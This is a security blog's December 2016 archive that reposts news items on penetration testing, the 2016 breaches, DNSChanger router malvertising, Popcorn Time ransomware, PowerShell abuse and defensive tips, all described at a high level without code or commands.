Monthly Archives: December 2016

Penetration Testing Not Vulnerability Assessment – Compliance Impact

Multiple regulatory compliance requirements have made changes as of late that involve adding Penetration Testing to be performed on an organizations environment.   With this added requirement, comes added complexity and typically added confusion to the project.  Most the confusion is a direct-result of organizations being uninformed on the differences between penetration testing and vulnerability scanning/assessments.


For the record, a vulnerability scan (or vulnerability assessment) looks for known vulnerabilities in a system and reports potential exposures.   A penetration test is designed to actually exploit weaknesses in the system architecture or computing environment. There is a significant importance in knowing the difference between these two exercises prior to engaging with a security vendor, and this knowledge can be beneficial in limiting any surprises that may surface as a result.


Many companies market and advertise capabilities in penetration testing, but potential customers of these vendors would be smart in researching their methodologies prior to entering into any agreements.  For example, the Payment Card Industry Security Standards Council (PCI SSC) now requires as part of PCI DSS version 3.0 that penetration testing in relation to PCI compliance requires the penetration testers follow an “industry-proven methodology” such as NIST SP 800-115 or Open Web Application Security Project (OWASP).  This can only be in reaction to the market being flooded with vendors marketing penetration testing services and yet, only providing a “glorified” vulnerability assessment.

Identifying Penetration Testing and Vulnerability Scanning

Aside from the definitions provided in our opening paragraph, there are major differences that should be identified and agreed upon between any organization and potential security vendor.

  • Period of Performance: As a general rule of thumb, vulnerability scanning should be a continual exercise and conducted at least quarterly and/or as new equipment is introduced into the environment.  Conversely, penetration testing should be conducted less frequently (once per year) regardless of changes in the environment.
  • Reporting Capability/Results: Penetration testing reports are generally short explanations of what information was captured during the testing, while vulnerability reports are detailed baselines of vulnerabilities.  In addition, vulnerability assessment reports should be collected as they occur to ensure gaps are identified and mitigated.
  • Compliance Requirements: Both are required by PCI DSS, GLBA, and FFIEC regulations.
  • Work Requirements: Typically a vulnerability assessment can be performed by in-house staff or outside vendors, while “true” penetration testing should be provided by a third-party.
  • Overall Purpose: Probably the most commonly confused, and arguably the most important aspect of the two is its purpose or intent.  Penetration tests are utilized to demonstrate various exploits and as a tool to reduce exposure.  Vulnerability scanning is used for detection purposes and demonstrates when devices could be compromised.

Conclusions Penetration Testing, Vulnerability Assessment, Compliance

It’s simple to see that both a vulnerability assessment and penetration test could be used to improve the overall security posture of an organization, but identifying the differences is important in setting result expectations.  Asking simple questions about the process/methodology utilized, and the expected results of reporting can have a profound impact on your selection of a proven security vendor.


via:  praetoriansecure

Nintendo will pay you up to $20,000 to hack the 3DS

So you bought a Nintendo 3DS to play some Pokemon Sun… but now your Pokedex is complete and you’ve explored every inch of Alola. Now what?


If you’ve got a technical background, you might consider poking around the 3DS itself. There might just be a big ol’ stack of cash in it for you.


Nintendo has just launched a bug bounty program by way of HackerOne. Find a bug that can make a 3DS do certain things it’s not supposed to and Nintendo will cough up anywhere from 100 bucks to $20,000.


Nintendo is being pretty open with the sorts of things they’re looking to eliminate here. To quote them directly:

Below are examples of types of activities that Nintendo is focused on preventing:

Piracy, including:
– Game application dumping
– Copied game application execution

Cheating, including:
– Game application modification
– Save data modification

Dissemination of inappropriate content to children

As with most bug bounty programs, there are a few catches: the payout is up to Nintendo, you’ve got to be the first person to tell them about the bug (publicly or privately) and you’ve got to agree not to ever tell anyone else about the bug.


That last one in particular might trip up some people — many a researcher loves to detail their bug hunt to the public once a company has had a chance to fix it. Alas, as Nintendo can’t necessarily patch all bugs out of existence on all consoles (many of which never connect to the internet), they’re trying to keep a tight lid on things.


I get the sense that this is something of a dry run for Nintendo — an experiment to see how something like this might work on the Nintendo Switch. As an example: Preventing piracy on the 3DS is listed as one of the main goals, but that ship set sail long ago. They might find some new exploits they hadn’t seen before through this program, but that doesn’t help all of the ones that have come to light since the 3DS started shipping back in 2011.


via:  techcrunch

Lessons learned from the 7 major cyber security incidents of 2016

What to glean from the DNC and Yahoo hacks, the rise of ransomware.

Cyber incidents dominated headlines this year, from Russia’s hacking of Democrat emails to internet cameras and DVRs launching DDoS attacks, leaving the impression among many that nothing should be entrusted to the internet.


These incidents reveal technical flaws that can be addressed and failure to employ best practices that might have prevented some of them from happening.


The most important lesson is that cybersecurity is a perpetual battle in which neither side gets the upper hand for long and that requires constant incident post-mortems to discover the next measures to keep data and communications safe.


Here is a look at seven such incidents and what lessons they afford.

DNC hack

The theft of emails from the Democratic National Committee not only revealed information that turned many away from Democratic presidential candidate Hillary Clinton, it also showed that Russia was trying to influence the election in favor of Republican Donald Trump.

U.S. intelligence services say the hack was likely the work of Russian hackers with possible ties to top Kremlin officials, although the opinion is not unanimous. Trump disputes even that Russia was involved at all. President Barack Obama has called for a report on the incident before he leaves office next month, but it’s likely the true nature and impact of the breach won’t be known for long after that, if ever.

The case points up the general difficulty of attributing attacks to particular actors with incontrovertible evidence. Researchers at security vendors have attributed this compromise to Russian groups Cozy Bear and Fancy Bear based on its tactics and methods, but that doesn’t link it conclusively to the Russian government.


What the incident does show is that politically motivated attacks can be effective and can be carried out without leaving a smoking gun.

The attack exposes the influence foreign states can have over any country’s elections. More narrowly, candidates and their parties need to pay more attention to better network security if they hope to avoid this type of attack in the future, regardless of who the perpetrator is.

Dyn DDoS attack

This massive DDoS attack against major DNS service Dyn had more spectacular results than the perpetrators likely hoped for.

It was noteworthy for enlisting tens of thousands of internet of things (IoT) devices into a botnet that carried out much of the attack. Three waves of traffic hit Dyn Oct. 21, focusing on different Dyn data centers.


The attack was made more potent because when Dyn’s servers became flooded, DNS requests went unanswered long enough so the requesting machines – legitimate ones and bots – sent follow-up requests, compounding the traffic flood.

Because Dyn served major customers – Amazon, Etsy, GitHub, Shopify, Twitter – addresses for traffic headed their way couldn’t be resolved. Because these victims are so high-profile, it seemed to some that the internet was broken.

The lesson for enterprises is doubling or tripling up on their DNS providers so if one goes down, there’s a backup. They should look at lowering the time-to-life settings on their DNS servers so when attacks like this do occur they can redirect traffic faster to the backup DNS providers.

Panama Papers

Thieves stole 2.6 TB of data from the Panamanian law firm Mossack Fonesca, making this a major breach based on the volume of stolen information alone. Add to the mix that the data included details about how 70 past and current world political figures hid income from revenue officials in offshore accounts and the importance is even bigger.

The prime minister of Iceland was forced to step down due to the scandal, while officials in the U.K., France, Austria, South Korea and Pakistan faced public outcry.


The culprit is unknown, but researchers probing the law firm’s network found multiple applications and plugins that weren’t kept up to date and contained vulnerabilities. Network architects didn’t employ least privilege for administrators, so hacking just one set of credentials would expose more systems than it might have if admins had access to the minimum number of systems needed to do their jobs.

Yahoo hack

When Yahoo announced Sept. 22 that half a billion of its accounts had been hacked, it was the largest ever hack of its kind. Then it came out that the actual compromise happened in 2014, elevating the incident into the realm of the incredible.

Beyond the uncountable effects of that many accounts being vulnerable for that long of a time, the breach threw the $4.8 billion sale of Yahoo to Verizon into turmoil. It still hasn’t gone through, with speculation being that Verizon wants to trim $1 billion from the price because the hack affects Yahoo’s value.

The entire fiasco holds lessons for consumers: use strong, unique passwords for all accounts and change them regularly.

It also is an object lesson for businesses and other entities that might some day have to explain a breach – get out in front of the problem and be open with facts about how it happened and what’s being done to fix it. Also – and this is difficult to specify – they should employ detection platforms that expose such breaches more quickly.

NSA Shadow Brokers leak

Shadow Brokers, a hacking group of uncertain membership, tried to sell what it described as hacking tools stolen from an equally mysterious organization called Equation Group.

The importance is that Equation Group may have links to the NSA and Shadow Brokers may have links to Russia. One theory goes that Russia exposed the alleged NSA tools as a way to embarrass the NSA and weaken whatever response the U.S. might initiate against Russia for its alleged hack of the Democrat National Committee.

The advertised sale of the tools may have been a ploy to give the story wider attention and so a greater impact against the NSA.

It turns out the tools work against specific devices made by specific vendors were years old, and the tools may have been lifted from a single NSA server on which careless operatives had left them.

The importance is that it seems a Russian group hacked an NSA server to capture cyber spy tools.

$65 million bitcoin hack

Bitfinex, the bitcon trading platform, was hacked for nearly 120,000 bitcoin Aug. 2, an attack that undermined the company’s three-tiered and purportedly impregnable key-exchange architecture.

The hack was the third largest bitcoin heist, but Bitfinex is the largest platform for converting bitcoin to U.S. dollars so it resonated widely. Bitfinex spread the loss across all its customers’ accounts – 36% of each account’s value.

Beyond that, the exchange was using a complex authentication that required two factors, one held by Bitfinex and one by its security partner BitGo. It was supposed to be highly secure. Compromising both companies would be required if thieves wanted to steal funds, the company said when it set up the scheme. BitGo says its system wasn’t compromised.

The lesson is that even the most sophisticated bitcoin exchanges are still susceptible to hacks and individuals and organizations using them should take steps to minimize their exposure.

Ransomware v. healthcare

Dozens of ransomware incidents this year were carried out against health care institutions, revealing how easy and lucrative ransomware has become as a business as well as how low criminals will stoop when choosing victims.

Many healthcare providers who were hit didn’t have backups or other means to recover quickly from the attacks and so they paid the ransom. More than one that paid was hit again by the same actor coming back for a second bite of the apple.

These incidents are likely to continue as long as it’s relatively simple to infect a victim and extort payment. Ransomware as a service is cropping up in the internet underworld, making it a threat to consumers as well as giant corporations.

The prevalence of these attacks should serve as warning that businesses in any field should have reliable, secure backups that can recover machines that have been encrypted by ransomware. And they should have systems that detect these infections early so they can be isolated to minimize the damage they do.


via:  networkworld

Microsoft adds Skype translation to landline calls

With little fanfare, a significant change to Skype translation goes live.

One would think the addition of a feature like this would have Microsoft screaming from the rooftops, but very quietly Microsoft added a new feature to Skype that supports its real-time translation technology in calls to landlines and mobile phones.

The new feature was added to its preview build of the Skype Windows Store app late last week. The new version of Skype Preview can now perform real-time spoken-word translations via Skype Translator when calling landlines and mobile phones, and the person on the other end does not need Skype on their phone to receive translations or be translated.

Of course, it’s not for everyone. To use this new version of Skype Preview, you need to be run the latest build of Windows 10 Insider preview from the fast ring. That tends to be reserved for dedicated testers and developers, since fast ring releases aren’t as stable as normal builds and are geared for debugging.

Should you be running Build 14986, just download and install the latest version of Skype Preview from the store. If you already have Skype Preview installed, then all you need to do is check for updates.

Plus, you need some Skype credits or a calling subscription, since calls to landlines and mobile phones are not free. Good news if you are an Office 365 Home or Personal subscriber, as you get 60 minutes of free Skype calling minutes every month.

PC-free communication

It may still be in the early stages, but this advance is significant and cannot be understated. Instead of requiring both parties to be at a PC with a headset and Skype, one can be completely free of the PC. Think of the benefits to emerging countries where computing is not as widely available and they still use landlines. Or think of its potential uses for people in the field, far from a power plug but with a smartphone.

Either way, this enables translation technology to many more corners of the world. As more languages are added, it will only enable more global communication. Skype currently supports nine spoken languages: Arabic, Brazilian Portuguese, English, French, German, Italian, Mandarin, Spanish, Italian and Russian.

There is no release date for this version of Skype. Don’t hold your breath for it, as the fast ring builds are for Redstone 2, aka the Creators Update, which is tentatively scheduled for next spring (April/May). And no one has really been able to put Skype Update through its paces to see how well it works, so the app itself likely needs more work.


via:  networkworld

DNSChanger Malware is Back! Hijacking Routers to Target Every Connected Device

 Next time when you see an advertisement of your favorite pair of shoes on any website, even if it is legitimate, just DO NOT CLICK ON IT.

 …Because that advertising could infect you in such a way that not just your system, but every device connected to your network would get affected.

A few days ago, we reported about a new exploit kit, dubbed Stegano, that hides malicious code in the pixels of banner advertisements rotating on several high profile news websites.

Now, researchers have discovered that attackers are targeting online users with an exploit kit called DNSChanger that is being distributed via advertisements that hide malicious code in image data.

Remember DNSChanger? Yes, the same malware that infected millions of computers across the world in 2012.


DNSChanger works by changing DNS server entries in infected computers to point to malicious servers under the control of the attackers, rather than the DNS servers provided by any ISP or organization.

So, whenever a user of an infected system looked up a website on the Internet (say,, the malicious DNS server tells you to go to, say, a phishing site. Attackers could also inject ads, redirect search results, or attempt to install drive-by downloads.

The most worrisome part is that hackers have combined both threats in their recent widespread malvertising campaign, where DNSChanger malware is being spread using Stegno technique, and once it hit your system, instead of infecting your PC, it takes control of your unsecured routers.

Researchers at Proofpoint have discovered this unique DNSChanger exploit kit on more than 166 router models. The kit is unique because the malware in it does not target browsers, rather it targets routers that run unpatched firmware or are secured with weak admin passwords.

Here’s How the Attack Works:

DNSChanger Malware is Back! Hijacking Routers to Target Every Connected Device


Firstly, the ads on mainstream websites hiding malicious code in image data redirects victims to web pages hosting the DNSChanger exploit kit. The exploit kit then targets unsecured routers.

Once the router is compromised, the DNSChanger malware configures itself to use an attacker-controlled DNS server, causing most computers and devices on the network to visit malicious servers, rather than those corresponding to their official domain.


Those ads containing malicious JavaScript code reveals a user’s local IP address by triggering a WebRTC request (the web communication protocol) to a Mozilla STUN (Session Traversal Utilities for NAT) server.

STUN server then send a ping back containing the IP address and port of the client. If the target’s IP address is within a targeted range, the target receives a fake ad hiding exploit code in the metadata of a PNG image.

The malicious code eventually redirects the visitor to a web page hosting DNSChanger, which uses the Chrome browser for Windows and Android to serve a second image concealed with the router exploit code.

“This attack is determined by the particular router model that is detected during the reconnaissance phase,” a Proofpoint researcher wrote in a blog post. “If there is no known exploit, the attack will attempt to use default credentials.”

List of Routers Affected
The attack then cloaks traffic and compares the accessed router against 166 fingerprints used to determine if a target is using vulnerable router model. According to researchers, some of the vulnerable routers include:

  • D-Link DSL-2740R
  • NetGear WNDR3400v3 (and likely other models in this series)
  • Netgear R6200
  • COMTREND ADSL Router CT-5367 C01_R12
  • Pirelli ADSL2/2+ Wireless Router P.DGA4001N

It is not clear at the moment that how many people have been exposed to the malicious ads or how long the campaign has been running, but Proofpoint said the attackers behind the campaign have previously been responsible for infecting more than 1 million people a day.

Proofpoint did not disclose the name of any ad network or website displaying the malicious advertisements.

Users are advised to ensure that their routers are running the latest version of the firmware and are protected with a strong password. They can also disable remote administration, change its default local IP address, and hardcode a trusted DNS server into the operating system network settings.


via:  thehackernews

10 ways to beef up Digital Security

#1. Keep everything up to date. You know those annoying popups telling you updates are available? Do you ever click out of them? Dont. Always update at the time these appear.

#2. Two-step verification. Two-step verification or authentication should be set up for all your accounts that offer it. A unique one-time code is sent to the users phone or via e-mail that must be entered in the login field.

#3. Unneeded browser extensions? Review your browser extensions. Uninstall the ones you dont use. Too many extensions can slow down your computer.

#4. Encryption. Encryption software will scramble your e-mail and other correspondence so that prying eyes cant read them, but you and your intended correspondent can. If you must use public Wi-Fi (like at a coffee house), install a virtual private network to encrypt transactions.

#5. Lock screen protection for your mobile device. Your smartphone has lock screen protection in the form of a password to prevent a non-authorized user from gaining access. If you leave your phone lying around or lose it, youre protected if you have a password. Otherwise you are screwed.
In the same vein, your laptop should have protection from non-authorized users. Set up a password that allows access to using the device, including after hibernation periods.

#6. Check active logins. Some accounts allow you to check active logins to see if any unauthorized users have been in your accounts, such as Twitter, Facebook and Gmail.

#7. How easy can someone impersonate you? Could anyone phone your bank or medical carrier and give the correct information to bypass security, such as your favorite pets name? Who might know this information? Well, if its on your Facebook page, anyone who can view it. How much of your personal information is actually online? Many accounts allow a secondary password Ask them.

#8. Simple but powerful layers of protection.
Dont have login information written down on hardcopy.
Cover your webcam with tape (yes, cybercrooks have been known to spy on people this way).

#9. Sharing your personal life with the whole world. Set all of your social media accounts to the private settings you desire. Do you really want a potential employer to see you hurling at your late-night party? Make sure images that you post are not geo-tagged with your home address.

#10. Web tools. Check out the various toolbars that you can add to your browser to beef up security. Be selective and check ratings.


See him knockem dead in this identity theft prevention video.




via: robertsiciliano

New ransomware lets you decrypt your files — by infecting other users

The ransomware will lock your files, unless you pay up. But it also contains a far more sinister method of decrypting your files.


A new kind of ransomware comes with its own “referrals” program, one that you probably wouldn’t want to join.

The malware dubbed “Popcorn Time” locks your Windows computer’s files with strong AES-256 encryption, until you a pay a ransom of one bitcoin (or $780 at the time of writing).


(Image: MalwareHunterTeam)


But this ransomware comes with a twist.

The lock screen will let victims unlock their files the “nasty way” by sharing a link with two other people — presumably ones the victim doesn’t like. If they become infected and pay, then the original victim will receive a free decryption key.

Otherwise, infected users have seven days to pay the bitcoin ransom to an anonymous wallet.

According to one report, the ever-evolving source code suggests that if a victim enters the decryption code incorrectly more than a handful of times, the ransomware will permanently lock the files.

The ransomware just this week was updated to encrypt files in Documents, Pictures, Music and Desktop folders, as well as dozens of file extensions, including many of the most popular.

A series of screenshots tweeted by the MalwareHunterTeam, which found the ransomware, shows that the criminals purport to be Syrian, and that the money paid “will be used for food, medicine, and shelter to those in need.”


“We are extremely sorry that we are forcing you to pay but that’s the only way that we can keep living,” said the ransomware note.


(Image: MalwareHunterTeam)


(Image: Screenshot by MalwareHunter)


via:  zdnet

Why Physical Security Should Be as Important as Cybersecurity

Here are five tips to help small businesses increase physical security measures and protect their technology investments and data.

Many businesses spend vast amounts of time and money — and rightly so —focused on firewalls and encryption software to protect their IT systems and data. However, physical security is often overlooked in the debate over cybersecurity. It can be just as crucial, though, especially for small businesses that do not have as many resources as larger firms to devote to security personnel and tools.

Physical security helps companies protect assets, including IT infrastructure and servers, that make their businesses run and that store sensitive and critical data. Physical security encompasses measures and tools like gates, alarms and video surveillance cameras, but also includes another central element: an organization’s personnel. Crucially, business and IT leaders need to foster a culture of security in addition to investing in technology to protect the organization, according to security experts.

The Department of Homeland Security and the National Cyber Security Alliance (NCSA), a public-private partnership, have for the past 13 years been using October to annually mark National Cyber Security Awareness Month. The second week is focused on what organizations can do to create a culture of cybersecurity in the workplace.

Here are some strategies small businesses can follow to enhance physical security and make sure their data and IT infrastructure remains secure.

Instill a Culture of Security

An organization’s employees are its first line of defense, according to Malcolm Harkins, a security industry veteran and chief security and trust officer at Cylance, a cybersecurity firm focused on proactive defense.

Harkins says that companies should start improving their security “by building security awareness and instilling a culture of commitment by creating a great place to work.”

“If you do this, your employees are less likely to get disgruntled and will, in turn, not want to harm the company,” he wrote in an op-ed piece for CBS Boston. “Train employees on security awareness, such as locking and encrypting their systems, choosing safe passwords and only sharing confidential information with those who need to know.”

Invest in Security Gates and Doors

In addition to having a staff member in a building’s lobby monitoring who gets access to a company’s offices, security technology expert Robert Covington, the founder and president of togoCIO, writes in Computerworld that “systems requiring a proximity card for entry are now quite common, and with good reason.”

Such systems are important and should be used more than they are, he says, because they “provide tight granularity of access control for individual doors and a detailed audit trail.”

Yet, as Covington notes, badges or badge data can be stolen by thieves or malicious actors. Ralph Goldman, a security industry veteran and lead writer for the Lock Blog, tells CIO that wireless communication technology is now enabling businesses to deploy “smart locks” that can let firms add barriers to doors and unlock the doors remotely via wireless protocols

Monitor Your Systems and Space

Covington notes that video surveillance cameras “are very inexpensive today, and yet they can do double duty, not only detecting possible threats in progress, but allowing for forensic review of incidents. What a bargain!”

Surprisingly, he says, few companies use them — and many that do ignore them. “Cameras should be installed at all entry points to a facility, and in key areas such as data centers and telecom closets,” he says. “The video should be recorded and retained, with a live monitor placed on the desk of someone who can keep an eye on it.”

Getting Alerts with Alarms

Despite all of these measures, intrusion detection systems and alarms are also key elements of physical security. “Monitored alarms will help to drive away intruders – and ensure that staff or the police will be on their way if the alarm persists,” notes. “Consult a registered alarm specialist to find, install and maintain the ideal system for you.”

Covington notes that many small offices often share a common wall with other tenants in multitenant buildings. “You don’t have to watch many home improvement shows to realize just how easy it is to get through drywall,” he says. “You need an intrusion system, and you need one supporting unique codes for each individual for audit trail purposes.”

Focus on the Server Room

For many small businesses, their data center is a server or rack of servers in a closet or small room. Guarding and monitoring access to that physical space is essential to maintaining data security — and potentially the operations of the business if the servers are tampered with or destroyed.

“Security gates can be installed in a doorway in order to prevent access to the server room. These gates are easy to use and can be opened completely, providing unrestricted access to the room when needed,” notes Quantum Security Gates, a security gate vendor. “However, their strong construction and secure locks keep intruders out when they are locked.”

Physical security gates can also provide ventilation to server rooms — an advantage over a locked door. Gates can also be installed behind a locked door, Quantum notes.

“Some companies do not consider securing their server rooms due to cost concerns. This is not a smart strategy,” reports Quantum. “While installing security gates does come with a cost, this cost pales in comparison to the tremendous cost that could occur if the server room is broken into. Also, the potential hassles of replacing the information, programs and down time to operate your business.”

Quantum notes that some employees may not have the security clearance required to access the server room. In addition to workers, there are often visitors, clients and other people walking through offices.

“Protecting your server room from these people is important,” the firm adds. “It’s also important to remember that, in many office break-ins, criminals look for electronics and confidential information first. Therefore, it’s a good idea to not label your server room as such and, of course, to ensure that it’s protected by physical security gates.”


via:  biztechmagazine

PowerShell security threats greater than ever, researchers warn

Administrators should upgrade to the latest version of Microsoft PowerShell and enable extended logging and monitoring capabilities in the light of a surge in related security threats, warn researchers.

Microsoft’s Windows PowerShell configuration management framework continues to be abused by cyber attackers, according to researchers, who have seen a surge in associated threats.

In March 2016, security experts warned that PowerShell had been fully weaponised. In the following month, a report confirmed that PowerShell was used to launch 38% of cyber attacks seen by security firm Carbon Black and its partners in 2015.

Now more than 95% of PowerShellscripts analysed by Symantec researchers have been found to be malicious, with 111 threat families using PowerShell.

Malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network and carry out reconnaissance, according to Candid Wueest, threat researcher at Symantec.

“This shows that externally sourced PowerShell scripts are a major threat to enterprises,” he wrote in a blog post.

The researchers also found that many targeted attack groups use PowerShell in their attack chain because it provides easy access to all major functions of the Microsoft Windows operating system.

PowerShell is also attractive to attackers because it is installed by default on computers running Windows and leaves few traces for analysis. This is because the framework can execute payloads directly from memory.

Abuse of PowerShell is often made easier because most organisations do not enable monitoring and extended logging on their computers, making PowerShell threats harder to detect.

While many system administrators use PowerShell scripts for daily management tasks, researchers have seen attackers increasingly using the framework for their campaigns.

Many recent targeted attacks have used PowerShell scripts, according to Symantec. “The Odinaff group used malicious PowerShell scripts when it attacked financial organisations worldwide,” said Wueest.

“Common cyber criminals are leveraging PowerShell as well, such as the attackers behind Trojan.Kotver, who use the scripting language to create a fileless infection completely contained in the registry,” he said.

Malicious PowerShell scripts are mainly used as downloaders, said Wueest, such as Office macros, and during the lateral movement phase, where a threat executes code on a remote computer when spreading inside the network.

The most prevalent malware families that currently use PowerShell are W97M.Downloader, Trojan.Kotver and JS.Downloader.

Over the past six months, Symantec said it has blocked an average of 466,028 emails with malicious JavaScript per day.

“Not all malicious JavaScript files use PowerShell to download files, but we have seen a steady increase in the framework’s usage,” said Wueest.

“Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload. Attackers use this convoluted infection method in an attempt to bypass security protections,” he said.

Apart from downloading payloads, malicious PowerShell scripts have been used to perform various tasks, such as uninstalling security products, detecting sandboxed environments or sniffing the network for passwords.

The flexibility of the PowerShell language allows scripts to be obfuscated in multiple ways, such as command shortcuts, escape characters or encoding functions, the researchers have found.

Symantec expects more PowerShell threats to appear in the future. “We strongly recommend system administrators to upgrade to the latest version of PowerShell and enable extended logging and monitoring capabilities,” said Wueest.


via: computerweekly

5 Sure Signs Ransomware Attacks Are Intensifying

Attackers have begun to encrypt up wide swaths of business data, asking – and getting — five-figure payments for a decryption key; will IoT extortion come next? 

Ransomware continues to pose a potent threat to individuals and, increasingly, to companies. What’s worse, all signs point to ransomware attacks escalating the rest of this year and into 2017.

How bad is it? Arctic Wolf Networks has measured a 433 percent spike in ransomware attacks over the past year, and the FBI says victims paid up $209 million in the first quarter of 2016, up from $24 million in all of 2015. And that only counts complaints actually registered with the bureau.

A basic attack involves enticing a victim to click on a corrupted attachment or web link that arrives in a legit-looking email message. If the ransomware successfully downloads, it’s game over. In mere moments, all sensitive files on the targeted machine are swiftly encrypted. To unlock the files, the victim must purchase a decryption key from the attackers.

If you or your organization stores sensitive data, you could be targeted next. Frankly, the reason many organizations haven’t been compromised is that the bad guys haven’t gotten around to them yet. Here are five ransomware developments you’d be wise to fully grasp:

Attacks shift to companies.

Ransomware purveyors are reaping huge fortunes pillaging the business sector. These criminals are not content encrypting just the files on one PC; they are locking up wide swatches of data stored on servers deep inside company networks.

Elite criminals have begun probing long-known vulnerabilities in the open-source protocols that businesses rely on to stitch together digital systems and applications.Cisco recently disclosed how one ring has perfected a way to spread the notorious SamSam family of ransomware laterally inside company networks to multiple Microsoft Windows systems.

Iron-clad cryptography.

The latest ransomware variants are highly resistant to decryption. So if your organization does not maintain readily available back up files, purchasing a decryption a key, under duress, may be the only viable option. Typically, the victim is allowed 90 hours to pay up, a deadline emphasized by a countdown clock. Caught in a lurch, many companies are routinely paying five- and sometimes six-figure ransoms.

Bitcoin replaces cash.

The criminals are taking pains to route all attack-related communications through the Tor traffic anonymization system, making it difficult for law enforcement to track them down. And they demand payment in Bitcoin, which can be easily divided to pay ring members in an untraceable way.

“They’ll give you steps on how to acquire the Bitcoin,” says Travis Smith, senior security researcher at Tripwire, a supplier of compliance auditing systems. “Once you transfer your Bitcoin to the address they provide, then they’ll give you the decryption key,”

Perpetual exposure.

Most often the criminals will deliver a decryption key upon payment. But sometimes the key doesn’t work. Sometimes files get lost. There really is no way to tell if the attacker tampered with your files, or kept copies. And then there is the risk of re-infection. Cisco researchers report instances of ransomware striking the same users twice on the same machine.

What’s next?

It’s crucial to realize that what we see now are early examples of server attacks that only scratch the surface. More invasive, resilient network-level attacks are sure to come. Cisco anticipates the coming of self-propagating ransomware that can spread on their own, just as Conficker and other Windows operating systems worms proliferated nearly a decade ago. Tripwire’s Smith anticipates that it won’t be long before experimentation to spread ransomware through the Internet of Things commences.

“We could see ransomware begin to target thermostats and TVs, as far as encrypting IoT devices and preventing consumers from accessing those devices,” Smith says.

How do we deal with this today? Be vigilant and suspicious when clicking on attachments and web links. Never trust, always verify. Be obsessive about backing up important files. Train employees to be alert and patch known vulnerabilities in a timely manner, especially in open-source networking protocols. And, adjust to the fact that this will be the new normal, because ransomware is going to be with us for a while.


via:  inc